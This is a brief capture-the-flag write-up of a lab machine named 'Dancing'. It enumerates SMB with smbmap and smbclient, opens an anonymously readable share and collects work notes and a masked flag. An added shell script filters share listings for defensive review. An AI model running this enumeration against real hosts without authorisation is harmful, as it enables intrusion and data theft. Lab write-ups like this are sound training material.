Dancing
Recon
10.129.9.30
Port | State | Service | Version |
---|---|---|---|
135/tcp | open | msrpc | Microsoft Windows RPC |
139/tcp | open | netbios-ssn | Microsoft Windows netbios-ssn |
445/tcp | open | microsoft-ds |
SMB and RPC are available, so we can start enumerating.
SMB
└─$ smbmap -H 10.129.9.30
[+] IP: 10.129.9.30:445 Name: 10.129.9.30
└─$ smbclient -L 10.129.9.30
Password for [WORKGROUP\parallels]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.9.30 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
We are actually able to view shares, and WorkShares is available!
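From the defender's side of the listing above, this added example (not part of the original writeup) filters `smbclient -L` output down to the shares that are not Windows defaults, which are the ones to review for guest or anonymous access. The function names and the sample listing are constructed for illustration.

```shell
#!/bin/sh
# Added example: pick the non-default shares out of `smbclient -L` output.

# Constructed sample: the share table from the listing above.
sample_listing() {
cat <<'EOF'
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
WorkShares      Disk
Reconnecting with SMB1 for workgroup listing.
EOF
}

# Reads a listing on stdin, prints "name<TAB>type" for each share that is
# not a Windows default (ADMIN$, IPC$, print$, drive letters such as C$).
nondefault_shares() {
    awk '
        $1 == "Sharename" && $2 == "Type" { in_table = 1; next }
        !in_table                          { next }
        $1 ~ /^-+$/                        { next }
        {
            # Find the type column; the fields before it are the share name,
            # so names containing spaces are kept whole.
            t = 0
            for (i = 2; i <= NF; i++)
                if ($i ~ /^(Disk|IPC|Printer)$/) { t = i; break }
            if (t == 0) { in_table = 0; next }   # first non-row line ends the table
            name = $1
            for (i = 2; i < t; i++) name = name " " $i
            if (name ~ /^(ADMIN[$]|IPC[$]|print[$]|[A-Za-z][$])$/) next
            printf "%s\t%s\n", name, $t
        }
    '
}

# Stand-alone run against the constructed sample.
sample_listing | nondefault_shares
```

Custom hidden shares (a name ending in `$` that is not one of the defaults) are reported too, since hiding a share from browsing does not restrict access to it.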
└─$ smbclient \\\\10.129.9.30\\WorkShares
Password for [WORKGROUP\parallels]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Mar 29 04:22:01 2021
.. D 0 Mon Mar 29 04:22:01 2021
Amy.J D 0 Mon Mar 29 05:08:24 2021
James.P D 0 Thu Jun 3 04:38:03 2021
5114111 blocks of size 4096. 1732677 blocks available
We were able to grab worknotes.txt from the Amy.J folder and flag.txt from James.P.
└─$ cat worknotes.txt
- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing
And...
└─$ cat flag.txt
5f6****************664
Summary
These are easy little refreshers.